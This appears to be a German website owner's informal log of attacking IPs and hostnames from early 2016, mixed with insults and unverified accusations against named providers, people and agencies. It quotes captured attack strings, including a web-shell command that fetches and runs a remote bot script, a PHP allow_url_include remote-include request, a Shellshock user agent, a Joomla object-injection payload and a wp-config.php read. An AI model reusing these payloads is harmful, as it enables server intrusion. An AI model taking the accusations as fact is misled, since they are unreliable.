____


"Loseblattsammlung" von "Häcker"Adressen ...

bot-netze: Angreifer auf meine website(n): 
"Hakker"/viren-verseuchte(?) Rechner (IP-Adresse, DNS, Domainname):
(key.word: TCP/IP IPv4 IPv6 IPX hacker Adressen crack Internet WWW counter Statistik webalizer Attacke nicht? Anonymous Administrator rdp root sa Superuser IDS Monitor firewall cisco fritzbox Kryptotrojaner Test Penetrantionstest Schwachstellenanalyse Abwehrzentrum Lösegeld password knacken app ...)

new: darknet

>= Januar 2016

Aktuellste Daten idR hinten bei Textmarke ööö

WER INTERESSE AN DETAIL-INFORMATIONEN HAT BITTE MELDEN!

siehe auch hakker1.log

IDS-Meldung: JavaScript-Trojaner via serverhacking versucht einzuschleusen (via GET allow_url_include ..., r57shell, .ru auch in deutscher Sprache)

-------------------------------------------------------------------------------------------
Trojaner-Mail-Anlagen(1.):
trojaner160301.js
JavaScript Sandbox on VM ... Erpressungstrojaner Ransom32 

-------------------------------------------------------------------------------------------
sonstiger Müll und Spitzel "Konsumforscher"/aka WerbeMafia:
	farm.plista.com fls-eu.amazon.de fonts.googleapis.com gmpg.org 
googleads.g.doubleclick.net google-analytics.com hello.myfonts.net html5shim.googlecode.com
	js-agent.newrelic.com jsl.bri-img.de lc.iadvize.com s3.amazonaws.com s62.mxcdn.net
...

-------------------------------------------------------------------------------------------
hv32accu5116.xentricserver.com 173.248.130.41 5.153.238.103 vmi49283.contabo.host 5.189.164.141 
10.173.206.183.static.js.chinamobile, lh7830-1.intermedia.net 64.78.30.2, 119.9.76.189 
69.42.84.132 = rtatoo1.webair.com, 64.90.38.104 ds7748.dreamservers.com, 
108.174.24.107 173.254.203.80.static.quadranet.com 178-33-160-252.kimsufi.com 178.33.160.252
infong849.lxa.perfora.net 4.xrfuwuqi.com n24.c06.mtsvc.net 205.186.184.24 191.252.46.105 
185.26.145.217 posta.cloudef.com 95.70.135.226 78.166.123.211.dynamic.ttnet.com.tr 
ccntechnologies.com 213.229.91.9, 217.77.220.195 -- 04.01.2016 -- 188.143.232.22 
cp1029.blacksun.ca 69.27.102.9, 78.46.94.179 static.179.94.46.78.clients.your-server.de 

Serverstörung hosting Störung downtime shutdown bananenstaat bananenjustiz dödel 

78.166.123.211 ttnet.com.tr ec2-52-53-213-51.us-west-1.compute.amazonaws.com 85.108.137.128.dynamic.ttnet.com.tr 
my-gateway-va.salay.com.tr mail.mestako.lv gvo238233.gvodatacenter.com 195.174.127.168 202.6.19.50.sta.isp-thailand.com 
GET+POST u18079923.onlinehome-server.com 216.250.117.56 [05/Jan/2016:08:33:56 +0100] "libwww-perl/5.833", 
ns501554.ip-198-27-68.net 198.27.68.131, infurio.com web0.stormweb.net p3nw8shg357.shr.prod.phx3.secureserver.net 
pleskcl0144.hospedagemdesites.ws server.milongaistanbul.com 185.93.187.59 187.40.88.241 114.108.175.185 
85.214.83.8 www22.aname.net 214.194.78.125 180.250.135.126 pemlinweb160.blacknight.com 78.153.218.6 mail.votreebook.com 
195.154.231.45 104.155.62.141 200.109.230-177.estatic.cantv.net 82-208-67-198.static.mts-nn.ru booster7.mundofull.com 

104-6-167-41.lightspeed.wlfrct.sbcglobal.net 104.6.167.41 hostedby.i3d.net 
221.ip-51-254-131.eu 218.232.94.57 12.108.142.218 202.6.17.27 218.232.94.57 jpcaparas.com 107.161.95.22 
ks301110.kimsufi.com 91.121.73.111 h2248132.stratoserver.net 85.214.243.234 139.seven.greendata.pl 
cpanel.pluralecom.it 188.143.232.24 218.232.94.57 unallocated.sta.lan.ua  

166.62.88.223 USA Ami-Trash secureserver.net, EU-Müll ns223368.ip-37-187-24.eu 37.187.24.158 
rdns-0.vocebemvindo.com.br 50-245-253-185-static.hfc.comcastbusiness.net 212.48.127.128 

server.konzeptmedia.nl ec2-52-35-46-16.us-west-2.compute.amazonaws.com 52.35.46.16
malware android trojaner 
204.93.183.81 unknown.scnet.net jpcaparas.com 184.172.15.237 107.161.95.22 109.230.229.50 web2.linux-power.de 

!!      hostname "." oder "" or " " = 149.255.104.211 
	[12/Jan/2016:01:28:11 +0100] "GET / HTTP/1.1" 404 - "http://hundejo.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36
	etc.

vps11550.inmotionhosting.com 216.194.173.26, ip-173-236-253-44.nodes.dreamcompute.net 173.236.253.44 
"POST /%22%20data-clickurl=%22%22%20class=%22url%22%20data-dot=%22url%22%3Ebudich.org/public/hakker2.htm%3C/a%3E%20%3C/div%3E%20%3C/div%3E%20%3C/div%3E%20%3Cscript%3E%20JAK.Fulltext.ResultScreenshotResize(%22
77.93.110.140 72.32.10.144 dala.vhost.lt 213.226.189.240, unallocated.sta.lan.ua 77.93.110.140 
plesk69.hospedagemdesites.ws 187.45.210.101 -- 81.177.49.139 NimbleCrawler 2.0.1 obeys UserAgent NimbleCrawler For problems contact: crawler@healthline.com
139.seven.greendata.pl box1021.bluehost.com horsetranslogistics.com 79.94.151.27.broad.fz.fj.dynamic.163data.com.cn 
ip-45-40-139-217.ip.secureserver.net 221.ip-51-254-131.eu 51.254.131.221 95.10.96.201.dynamic.ttnet.com.tr 95.10.96.201
11.ip-158-69-215.net 158.69.215.11 46.101.40.87 89.218.71.214 188-143-232-13.server.com 188.143.232.13 
91.236.251.96 dc16-cc-internet.ip-connect.net.ua 81.169.136.238 118.126.13.119 sol-fttb.216.155.118.46.sovam.net.ua 

11.01.2016
204.93.183.81 unknown.scnet.net 37.187.24.36 serveur.infoconcours.com ami-scheiß p3plcpnl0924.prod.phx3.secureserver.net 50.62.177.74 
slowakei tschechen 217.16.180.93 discovery.vshosting.cz 69.30.244.186 188-143-232-13.server.com 204.12.124.138 

195.146.6.111 221.ip-51-254-131.eu 88.198.217.231 saturn.ozonhost.ru 91.203.144.114 turbo-partner.com.ua 
178.254.1.205 v21205.1blu.de gvo238233.gvodatacenter.com 97.79.238.233 46.238.32.131 ip-46-238-32-131.home.megalan.bg 
121.78.195.46 185.93.187.49 -- verseuchte computer --

198.27.68.131 sendmail.thinking.co.nz 54.153.154.169 177.47.187.20 immer dieselben Blödbommel "Beamte" 198.27.68.131 = ns501554.ip-198-27-68.net OVH-Müll?, 161.ip-37-187-49.eu = 37.187.49.161, früher kamen vor allem Porno-Spammer aus dem netz von .NL srv047028.webreus.nl = 46.235.47.28, uhl.k2b.at 86.59.114.184, 94.102.52.41 oneh.pw relay-j.tor-exit.network = 5.79.68.161 09:40 14.01.2016, millera-motors.eth.net.microlink.lv 62.4.3.125 189-46-3-249.dsl.telesp.net.br d2.20.089f.ip4.static.sl-reverse.com 159.8.32.210 hugei7.dseremini.com 177.47.187.20 = .br, static.107.151.243.136.clients.your-server.de 136.243.151.107 180.109.80.129 Türkei 78.165.76.186.dynamic.ttnet.com.tr Genozid srv3.srlpunto.com OVH: 198.27.68.131 193.106.92.210 niners.unisonplatform.com 88.198.217.231 178.33.149.1 saturn.ozonhost.ru krzemek.pl softigation.com shared02.webhostwinkel.nl p11w15.geo.bf1.hostingprod.com 98.138.81.178 mal wieder die Idioten vom Ponyhof: 195-154-194-111.rev.poneytelecom.eu 64.13.232.26 hst-46-166-161-96.balticservers.eu mx-ll-110.164.189-12.static.3bb.co.th 110.164.189.12 Meine Internetseite und das dort geschriebene müssen wohl wahr und wichtig sein, sonst würden sich nicht so viele Diebe, Stasies und möchtegern Hacker daran versuchen. Danke an meinen Provider! 110.164.189.12 hw84.rusonyx.ru 195.154.194.111 104.37.187.77 no-rdns.m247.ro 112.78.117.15 sv14.minibird.netowl.jp 78.46.94.179 58.62.235.0 94.155.49.174 inkl. SPAMmer grabber bots: 177-139-108-63.dsl.telesp.net.br und bildsuchmaschine 89.35.7.226 webwin.chml.ro l37-194-194-193.novotelecom.ru 0.tor.exit.babylon.network colateral kolateral Schaden srv3.srlpunto.com 5.135.166.121 75.98.175.97 a2ls3.a2hosting.com rdns-0.vocebemvindo.com.br 195.154.227.118 mutugw.phpnet.org 195.144.11.46 linux16.unoeuro.com 94.231.106.109 97.74.144.174 192.225.226.16 lsh1019.lsh.siteprotect.com 64.71.32.32 50.62.177.74 advanced1318.inmotionhosting.com 185.37.161.129 198.27.68.131 178.44.107.150 75.98.175.112 ssr12.supercp.com 58.62.235.0 server.sambaserver.com.br host-5-77-241-10.orangearmenia.am 176.15.96.140 nat-54.usib.tv ip-128-204-29-32.bb.netbynet.ru 144.76.244.168 50.62.177.74 14.63.163.159 host.valenciawebhosting.com 207.7.90.34 16.01.2016 81.177.49.139 23.251.55.110 softbank126074192017.bbtec.net hostedby.i3d.net goethe.timeweb.ru OVH france germany ridid751.vds ec2-52-29-86-160.eu-central-1.compute.amazonaws.com softbank126074192017.bbtec.net 218.232.94.57 ns330824.ip-37-187-159.eu 0.32.32.95.dsl-dynamic.vsi.ru modemcable066.44-37-24.static.videotron.ca ec2-52-35-152-106.us-west-2.compute.amazonaws.com 24-159-188-64.dhcp.kgpt.tn.charter.com www.co.pierce.wi.us 81.177.49.139 242.61.89.110.broad.pt.fj.dynamic.163data.com.cn 183.206.173.10 server.konzeptmedia.nl 149.210.211.171 vserver122.axc.nl 107-181-226-2.static.gorillaservers.com 107.181.226.2 saturn.ozonhost.ru 91.203.144.114 turbo-partner.com.ua 85.179.177.67 89.218.71.214 sendmail.thinking.co.nz 58.62.235.0 krzemek.pl 88.198.217.231 193.106.92.210 niners.unisonplatform.com hw84.rusonyx.ru mx-ll-110.164.189-12.static.3bb.co.th Asia Japan ASEA a2ls3.a2hosting.com ami-shit 97.74.144.174 penetrationstest mutugw.phpnet.org 192.225.226.16 169.53.28.20 europäischer Geheimdienst ssr12.supercp.com 75.98.175.112 modlotta.pdf piratenpartei moderator admin forum carl.dugage.com 198.27.68.131 Maulwurf U-Boot Panzer härten outdoors4less.magemojo.com 199.189.227.172 14.63.163.159 217.16.180.93 discovery.vshosting.cz 69.30.244.186 ip-46-238-32-131.home.megalan.bg 121.78.195.46 62.4.3.125 softigation.com p11w15.geo.bf1.hostingprod.com hst-46-166-161-96.balticservers.eu 185.37.161.129 nat-54.usib.tv server77-68-62-142.live-servers.net 77.68.62.142 75.98.175.112 ssr12.supercp.com 195-154-194-111.rev.poneytelecom.eu 195.154.194.111 cpanel.pluralecom.it mail9.trusttelecom.fr 93.93.189.162 188.143.232.19 heaven.tor.ninja 193.109.196.183 202.69.240.84 premium-cuban-cigars.com 204.79.180.176 web07.scit.ch 185.78.126.207 dot9.dothome.co.kr 112.175.184.9 37.187.24.158 eu.ovh p3plcpnl0755.prod.phx3.secureserver.net 50.62.177.13 (normaler USA Krieg U238) Spitzel Agent orange diaoboomsky3.example.com box1306.bluehost.com dot9.dothome.co.kr 5.153.238.103 node-1bsq.pool-101-109.dynamic.totbb.net vmi49023.contabo.host 172.245.128.159 101.109.241.250 185.42.175.36 static-185-42-175-36.radedns.com kooperierende scanner+verbrecher: 62.210.29.99 178.254.37.5 62-210-29-99.rev.poneytelecom.eu v32502.1blu.de 119.130.97.32 169.45.102.7 senojeel.net www.idieze.com stasi bka lks nsa mfs 213.186.33.3 host30-44.creolink.com 112.175.184.9 1.246.219.121 ns321314.ip-37-187-154.eu ns220989.ovh.net 188.165.210.82 107.150.45.106 37.59.56.6 ns3269861.ovh.net mx-ll-110.164.189-12.static.3bb.co.th s18111840.onlinehome-server.info 217.160.131.80 1&1 1and1 tradeforecast.biz 92.60.176.13 BOT for JCE 37-146-123-238.broadband.corbina.ru 109.163.247.5 cpro31421.publiccloud.com.br accent.websitewelcome.com 192.185.82.213 218.232.94.57 200.53.181.65 188.165.210.82 ns211035.ovh.net toldossaez.com 91.142.208.85 191.101.30.180 183.60.244.44 183.60.243.190 208.123.223.115 69.238.205.121.broad.pt.fj.dynamic.163data.com.cn 92.222.178.34 UVH 34.ip-92-222-178.eu 5x164x197x142.dynamic.nn.ertelecom.ru sol-fttb.146.121.119.46.sovam.net.ua 5.153.238.103 92.243.117.198 17-142-157-180.applebot.apple.com 17.142.157.180 46.119.119.70 aus der Türkei ttnet.com.tr 78.185.42.212, 217.160.131.80 s18111840.onlinehome-server.info 121.190.197.2 ge-0-0-0.esr1.itx1.par.neotelecoms.com 83.167.32.233 92.243.117.198 92-243-117-198.nts.su 37.146.123.238 109.163.247.5 ------------------------------------------------------------------------------------------- 185.42.175.36 static-185-42-175-36.radedns.com das dumme us amerikanische trojanisch pferd vom ponyhof.eu 62.210.29.99 läuft syncron mit dem remote-cc-bot auf v32502.1blu.de // 119.130.97.32 senojeel.net 64.207.159.171 www.idieze.com host30-44.creolink.com 4.xrfuwuqi.com 1.246.219.121 OVH-Müll: 188.165.210.82, ns321314.ip-37-187-154.eu ns220989.ovh.net chulak.enn.lu Das Geschäftsmodell Amazon Inc. und Geheimdienste NSA und Häckerbanditen ec2-54-200-60-70.us-west-2.compute.amazonaws.com hw65.rusonyx.ru dazu asiatische IP Adressen /download.php?file=file:///var/www/wp-config.php aber auch 1&1 Germany s18111840.onlinehome-server.info Waffenhändler Militärindustrie sicheres Herkunftsland toldossaez.com 91.142.208.85 183.60.244.44 183.60.243.190 --23.01.2016-- 178.22.58.174 vps02.quebit.nl lamp17-out.cloudaccess.net 162.246.22.179 113.130.70.78 92.243.117.198 HubSpot Webcrawler 54.174.53.217 183.111.174.72 wl32-f207.wedos.net = 46.28.105.84 nsa-zentrale ;-) fo-p00-ob.rzone.de 81.169.144.135 in koopereation mit shared02.webhostwinkel.nl infong-es16.1and1.es, diaoboomsky3.example.com 198.12.81.34 198-12-81-34-host.colocrossing.com hosted.by.pcextreme - - [24/Jan/2016:04:37:38 +0100] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://www.bsucesso.com.br/img/r.txt HTTP/1.1" 200 19150 "-" "LWP::Simple/6.00 libwww-perl/6.05" 5.153.238.103 static.vdc.vn 203.162.0.78 187.45.210.115 plesk0080.hospedagemdesites.ws server62.web-hosting.com 199.188.204.130 199.188.204.131 84.237.187.92 45-125-192-150.ip4.readyserver.sg 203.133.168.213 sync: 153-150-93-178.pool.ukrtel.net net-62-183-86-46.kbrnet.ru broadband-37.204-251-62.nationalcablenetworks.ru 107.150.45.106 31.134.20.198 94.79.32.243 bot netzwerk 37.202.4.100 hs1.hostpark.com.ua seo105.seoboxes.com p11w29.geo.bf1.hostingprod.com 91.15.86.185.in-addr.arpa.routergate.com www.ora.nsysu.edu.tw foxglove.arvixe.com 75.gprs.mts.ru 7.175.206.183.static.js.chinamobile 40.115.184.93 73.a4.35a9.ip4.static.sl-reverse.com 195-154-194-111.rev.poneytelecom.eu ppp-jt2-d.telkom.net.id 78.25.121.154 180.254.37.107 46.97.13.45 188.124.242.139 dedic652.hidehost.net 109.163.247.5 183.111.174.72 blade188.mijndomein.nl bba572281.alshamil.net.ae 86.98.213.19, 185.63.189.210 sarmo.ru 69.30.244.186 sindwellplesk.hosting24.com.au 125.214.75.67 host.vdc.space 183.81.164.135 vh212.sweb.ru 77.222.56.195 187.45.210.101 78.185.189.166.dynamic.ttnet.com.tr - - [26/Jan/2016:07:11:02 +0100] "GET /bitrix/admin/index.php?lang=en hosted.by.pcextreme http://www.bsucesso.com.br/img/r.txt 109.72.94.21 gw-cluster006.ovh.net 213.251.182.106 139.seven.greendata.pl nl8x.mullvad.net 37.48.65.71 69.27.126.131 srvmail03.thuehost.vn 177.137.89.77 client-238.viscomp.bg 27./28.01.2016 keyneticsaholic.com 209.135.141.234 mal wieder das telekom-pony 195-154-191-97.rev.poneytelecom.eu 144.76.71.83 static.83.71.76.144.clients.your-server.de (Adreßgrabscher) 40.115.184.93 123.49.52.54 204.12.124.138 189.115.107.63.static.host.gvt.net.br ip-97-74-119-75.ip.secureserver.net 89.248.96.58 89-248-96-58.redes.interdominios.com 17.81.150.178.triolan.net 178.150.81.17 202.69.240.192 Test bestanden: ip-122-152-167-8.asianetcom.net check ok ;-) v133-130-115-91.a046.g.tyo1.static.cnode.io h179.helix.fastwebserver.de 104.145.234.55 208.43.13.43 87.255.89.12 49.231.16.99 113.147.dynamic.pppoe.fregat.ua 5.153.238.103 37.187.149.30 mail.tecnoydes.com 85.108.32.102 115.92.24.141 pue.puertovallartanuevo.com 192.254.164.125 //cfg-contactform-20/upload/jalang.php?cmd=curl+-C+-+-O+http://www.tonerbazis.hu/bot.txt%3Bperl+bot.txt%3Brm+bot.txt 91.98.103.46.pol.ir 95caf7a9.deskaas.com 5.153.238.103 202.69.240.222 27.255.94.166 serv3.pixl.nl 109.237.211.201 77-121-232-181.dhcp.kram-city.net 77.121.232.181 host81-138-20-196.in-addr.btopenworld.com 62.210.190.10 192.99.18.58 ns1-cpb14.likuid.com 116.119.128.120 srv445169-1.cloud.colt-engine.it 81.31.148.72 host81-138-20-196.in-addr.btopenworld.com 81.138.20.196 197.230.26.130 power.webkur.net n248h206.sprintdatacenter.net 185.10.51.178 server1.wwwanted.nl 5.56.63.53 46.146.223.4 vetta.tv 91.121.146.189 mail.tecnoydes.com 171.249.200.92 lamp109-out.cloudaccess.net mail.grupodonana.com 81.192.170.176 sol-fttb.135.116.118.46.sovam.net.ua uploader.play-aa.net 23.251.55.110 173.254.203.80 tor-proxy-readme1.casperlefantom.net 176.31.191.26 tor-exit4-readme.dfri.se server.fikribir.com 185.48.180.198 lsh1019.lsh.siteprotect.com s17-www.ogicom.net v039263.home.net.pl ns357786.ip-91-121-146.eu 91.121.146.189 s17.syscover.net 82.223.13.160 cfg-contactform-10/inc/upload.php mail.votreebook.com 112.111.165.173 ccntechnologies.com 213.229.91.9 vps48926.public.cloudvps.com 141.138.206.201 http://www.tonerbazis.hu/bot.txt 216.177.128.173 95.215.226.247, dedi37344.dedicloud.co.uk 149.255.57.204, 198.12.149.197 69.31.51.211 8.5.1.58 torproxy02.31173.se 185.65.135.227 cursa.elkdata.ee b2b-92-50-78-198.unitymedia.biz 92.50.78.198 ssdns1.poweruphosting.com alfa3041.alfahosting-server.de 109.237.138.16, ns392953.ip-176-31-107.eu 77.93.110.140 hacking SCORE online MONITOR
http://www.tonerbazis.hu/bot.txt
[08/Feb/2016:12:xx:xx +0100] hessel3.torservers.net 109.163.234.5 5.9.17.118 static.118.17.9.5.clients.your-server.de h179.helix.fastwebserver.de talpinimas.programuotojas.eu /js/lib/ccard.js box8.dnsexit.com 67.214.175.68 //cfg-contactform-5/inc/upload.php atomrocket datamining n248h206.sprintdatacenter.net 185.38.248.206 88.254.62.239.dynamic.ttnet.com.tr UK: 212.78.90.131 scanner POST /tmp/kurd.php, 188.93.231.156 ycorn05.ibername.com hm6136.locaweb.com.br 60.10.199.167 erfurt-s02-i02.cg-dialup.net 84.19.169.165 www.ora.nsysu.edu.tw 140.117.150.103 lambda.ip-colo.net 195.3.144.92 host-2-98-126-206.awesomedns.com 206.126.98.2 --[14/Feb/2016 +0100]-- 112.111.165.173 tor2e1.privacyfoundation.ch 176.10.104.243 torproxy02.31173.se tor-exit.scharmerlaw.com blade-server.leasevps.com orion.enn.lu static.vdc.vn 192.200.31.2 en305.mirohost.net 89.184.76.197 -- 176.160.206.183.static.js.chinamobile 23.96.54.209 google: 220.117.155.104.bc.googleusercontent.com = 104.155.117.220 195.146.6.111 useragent: }__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"\":0:{}s:8:\"feed_url 19/Feb/2016:13:44:14 ns3343852.ip-94-23-252.eu 94.23.252.53 /cfg-contactform-1/inc/upload.php, UBE UCE spam telefon fax phone VoIP werbemafia 91.200.12.24 208.109.52.50 tchod.com.br www.ora.nsysu.edu.tw 140.117.150.103, code-mode.cakestandchar.net 8.5.1.58, 195.154.241.119 boveverhuur.nl 81.169.235.173 UA user agent useragent "." war bspw.: 149.255.104.211 149.255.104.128 - 149.255.104.255 MPP-GROUP-LTD-1 GB WILDCARD-MNT@openitc.co.uk bazaruto.servisis.co.mz 41.76.150.198 [22/Feb/2016 +0100] & hacker-oase ovh.net.eu 188.165.247.139 1and1 s15383043.onlinehome-server.info 87.106.191.53 193.0.184.20 mail.muhle.com.mx 187.210.27.10, 5.189.178.100, http://www.tonerbazis.hu/bot.txt ns3343852.ip-94-23-252.eu OVH:37.59.56.6 pie-vpc-006.pie-coop.net, Ukraine:91.222.138.173 !! stark zunehmend Angriffe aus Brasilien, Russland und der Ukraine nostress-www-1.superhosting.cz 95.168.200.122, kyivstar.net, 203.174.10.*, mail.jbe.ro 5.2.167.49+109.99.176.230 ssr5.supercp.com 31-210-127-102.turkrdns.com 12/2013 odo.dwds.de Berlin-Brandenburgische Akademie der Wissenschaften (Prof. Dr. Günter Stock Präsident der BBAW, Organisation: Dr. Alexander Geyken) 27.02.2016 ns1.arkaplan.com.tr 109.235.254.163 Python-urllib, HEAD, 188.165.247.139 GET and POST 96.44.183.27.static.quadranet.com 96.44.183.27 gefälschter useragent als googlebot 248.eight.greendata.pl mil.php configuration.php upload.php pbot.php candc.pl remotelgn.cgi admin-ajax.php server.mobilesecurityfirst.com WebFuck T0PHackTeam 203.236.50.22 webfuck.shell \\ 176.9.9.163 = ripe-mntner@hetzner.de = konsoleh ?_BND-BKA_Bundestrojaner_? usvip6.noc401.com 107.178.102.66 114.125.42.193 pokerhideout.co.uk #Cybersicherheit sh2103.evanzo-server.de 87.238.192.103 mxjk.jin-kui.com ns357786.ip-91-121-146.eu ram-web04.cpt4.chs.hetzner.co.za 02.03.2016 !! ds45.digital-network.net auf IP 83.243.48.2 wo auch proxy-2.nic.rlp.de gebunden ist 06/Mar/2016: gw-cluster005.ovh.net 213.251.182.105, centsvr.markporthouse.net 82.69.63.80, gvo255237.gvodatacenter.com 199.116.255.237 Deutschland u18872556.onlinehome-server.com 74.208.164.91 strato 1 und 1, ip-220-96.dataclub.biz Ransomware Infektionen ube spam mail [10/Mar/2016: c-83-233-72-174.cust.bredband2.com 179.61.198.7 5.153.238.103, stupid prod1.hlivre.absolight.com 79.143.244.149 vetta.tv 46.146.223.4 ns3369158.ovh.net 37.187.90.59 pro7.linuxpl.com pluton.ffzg.hr 193.198.212.80 c2-w.ht-systems.ru 78.110.50.104 45.55.129.115 Digital Ocean Inc. USA Müll, 13.76.142.20 trash from Microsoft Corporation United States of America, beautyandyou.de = 78.46.202.203 Figaro Express Großhandel und Abholmarkt GmbH im Hetzner Netz 31.184.238.200, ns130.ipxon.com 158.69.119.130 = OVH Inc. USA häcker-robot, 173c247d228e10.relay05-mta.com =siehe: http://anti-hacker-alliance.com/index.php?ip=173.247.228.10, snapwidget.com scontent.cdninstagram.com cdnjs.cloudflare.com js-agent.newrelic.com code.jquery.com fls-eu.amazon.de stats.warenform.de prf. script.ioam.de de.ioam.de blog.ivwbox.de static.addtoany.com ad2.adfarm1.adition.com adfarm1.adition.com ups.xplosion.de dmp.theadex.com badbot: ipnet-37-205-37-33.midja.is www.trs.is 37.205.37.33, 31.184.238.200 LAN from Jijikov Sergei Aleksandrovich Data center: Russia, Saint-Petersburg, jijik2006@yandex.ru http://www.google.de/search?hl=de&source=hp&biw=&bih=&q=31.184.238.200&btnG=Google-Suche&gbv=1 RussenDisco http://anti-hacker-alliance.com/index.php?ip=37.205.37.33 Polka auf Eis Oscar Preis ns212414.ovh.net [16/Mar/2016:13:48:15 +0100] 188.165.220.19 Virusmail von 43.239.245.167 (Asien) divas-it.de 176.9.157.198 [17/Mar/2016:00:50:35 +0100], gw-cluster002.ovh.net, webserver.firb.br 173c247d228e10.relay05-mta.com 173.247.228.10. dummbot: loki.elkman.pl, /_ppinter/bwdumzen.pdf mail.mygrworld.com 91.109.3.190 /wpinfos.php?osc=, saturn.ozonhost.ru 88.198.217.231 187.79.9.55 www.ora.nsysu.edu.tw 140.117.150.103, 13.76.142.20, beautyandyou.de 78.46.202.203, s2.hostglobal.org 23.251.55.110 104.148.44.71 PUT /vjagt31424.txt 37.59.56.6 flash media object code api Russen java NPA divas-it.de 176.9.157.198 IT-Service GmbH 55124 Mainz Dipl.-Ing. Haydar Sen (FH) koop mit ns1.exion-hosting.nl 151.80.237.216 h230-ipv4-77-241-4.mynet.it Lübben Spreewald webdesign Gesundheitskarte Neuer Personalausweis serv3.pixl.nl 109.237.211.201, ns317120.ip-37-187-133.eu 37.187.133.53, webmaster@ns3002702.ip-37-59-6.eu -- OVH SAS France Network = Hacker and Staats-Spitzel Provider -- Dummbrote skript kiddies -- he244.vps.webenabled.net s.a. IPv6 gateway Serverfarm -- c13-w.ht-systems.ru 78.110.50.115 46.101.22.84 abuse@digitalocean.com Digital Ocean Inc. New York UNITED STATES of America USA NSA-Trash? noc@digitalocean.com oli.olive-servers.com 216.172.181.20 62.43.188.181 62.43.188.181.static.user.ono.com, static.41.172.243.136.clients.your-server.de = 136.243.172.41 //.libs.php, static.54.173.251.148.clients.your-server.de mit UA: "() { :;}; /bin/bash -c ´for OUTPUT in $(uname -a);do echo \".::Server::$OUTPUT ::\";done;id´" server.milongaistanbul.com 94.138.221.18, c-73-196-240-139.hsd1.nj.comcast.net 73.196.240.139, 173.208.136.170 server.redebis.com.br 66.7.203.196 syslog Auszug (nach Budich Lübben): 2016/03/21 21:12:26<134>INET: NAT: refused incoming session on ifc x prot 6 x:8080 <- 183.230.7.154:23982 und von: 200.164.92.165 :32903 142.255.59.245 :42987 186.79.35.45 :34551 189.222.226.105:3286 209.126.120.15:5210 195.154.214.162:5970 54.198.24.218:4935 49.79.122.116:56710 84.52.64.201:4935 188.68.224.62:57241 target:405 <- 218.246.0.97 :43783 telnet:23 <- 119.235.76.135 :43322 zielport:8443 <- 66.240.236.119:20012 census6.shodan.io ssh:22 <- 61.182.170.38 :3361 73.193.103.231:46121 218.21.45.34:49486 198.20.99.130 SingleHop BV 71.6.216.38 :995 Rapid7 Austin Texas 185.130.5.202 abuse@ohs4you.net Public VPS & dedicated servers in EU USA 9420 64.125.239.35 *.zayo.com 196.203.51.36 104.148.44.71 /editor/editor/filemanager/, 173.208.136.170 23.96.54.209 c2-w.ht-systems.ru 78.110.50.104 denkste: 13.80.17.248 ns4.i-mecca.net 216.187.94.181 96.44.183.26.static.quadranet.com 96.44.183.26 paschhost.de 84.200.42.101 tech-c: Pascal Bremmer Karlsruhe @pascalbremmer.de, ns1.exion-hosting.nl 91.238.176.123 pablo.dongee.com 192.95.18.119, 70.35.200.166 = 1and1 Fasthosts Internet Inc., web5.biotivia.com 173.203.19.27 210.212.102.69 186.202.161.20 siehe LACNIC, maildtln.locotech.ru 175.44.9.181 code-mode.cakestandchar.net ks3100133.kimsufi.com 37.59.62.43, 104.148.44.71 - - [25/Mar/2016:18:19:57 +0100] "PUT /aqyuo20420.txt 70.35.200.166 178-213-175-149-dynamic.retail.datagroup.ua vps.colaborae.com.br host62-187-110-95.serverdedicati.aruba.it 95.110.187.62 upload hacker-TOOL http://www.tonerbazis.hu/bot.txt 199.195.193.23.static.midphase.com passwort iphone geknackt FBI apple mail.differentit.ch 92.51.134.81, 199.33.124.100.rebelhosting.net, 30.03.2016 ns375706.ip-151-80-18.eu (üblicher OVH Netz SPAM), "das Internet der Dinge" Hat je einer aus dem OVH+Hetzner Netzwerk seriöse und nicht-hacker/nicht-spammer Zugriffe verzeichnet? frisch infiziert: mail.votreebook.com deny from 199.33.120 151.80.18 Macro Code Exploit Kits halbautomatische Jagdwaffen Wer microsoft office / ms-word mit vbs/scripting/macro-freigabe oder JavaScript nutzt ist selber schuld ... botnet ws024sla.sla.maschinenbau.tu-darmstadt.de 183.60.244.30 see Asia Pacific Network Information Centre 40.83.13.102, dummbot 85.25.24.22, paschhost.de 84.200.42.101, 80.255.192.237 @virginmedia.com Smallworld Media Communications Ltd Scanner? ppp85-140-2-111.pppoe.mtu-net.ru 109-61-245-244.dsl.orel.ru 193.178.118.43 31.03.2016: host30-90.miran.ru -permanenter bananentrojaner: ns375706.ip-151-80-18.eu(OVH) users174.phy.lolipop.jp vps24.purplehosting.it 82.223.31.148, 13.76.142.20 static.21.132.243.136.clients.your-server.de 62.210.152.164 heimdall.vsyst.net 67.198.170.122.customer.krypt.com 67.198.170.122 google-fake vetta.tv wp-admin/includes/class-wp-upgrader-list.php static.41.172.243.136.clients.your-server.de BRD Stasi Server LKA BKA Canabis.php ns303035.ip-94-23-203.eu 94.23.203.204 208.91.198-117.confluence-networks.com SPAMmer ns130.ipxon.com -- Samsa Samsam Samas Mokoponi -- BitCoin -- ns367573.ovh.net ns303035.ip-94-23-203.eu cph-kate05.customprofessionalhosting.com CIA FBI 216.138.226.210 c98-212.icpnet.pl 81-174-21-93.v4.ngi.it 06.04.2016 netdevelo9.vshosting.cz pal.bl.pg.gda.pl 27.118.22.26 Wissenswertes: www.de-cix.net "surft" via lch.for-the-inter.net DE-CIX Management GmbH Wer ist dort Gesellschafter? hacker: adook.vservers.es 91.142.220.240 luna432.startdedicated.de 85.25.100.104 dot9.dothome.co.kr Korea server1.linksgarantia.com 27.118.22.26 dedi-195-154-250-133.cloudlinkd.com 195.78.231.57 s231-57.furanet.com - - [12/Apr/2016:18:31:26 +0200] "GET /test/wp-admin/ push-router.cakestandchar.net analiseesuportesecad.com.br 193.201.224.176 informatique.plus - - [13/Apr/2016:10:04:13 +0200] anqun5143.kryptservers.com huangdisisi0708.com web.3nv.ru 185.100.213.114 tumesaenlaspalmas.com www.centralwebs.co.uk 212.78.90.131 huangdikqhufd0413.com webserver.firb.br 138.186.2.254 [17/Apr/2016:05:23:47 +0200] dns.langebio.cinvestav.mx 148.247.230.1 hacker: MSXML2.XMLH myc.mycoolwebsites.com mail1.telpro.lt 138.186.2.254 91.236.239.47 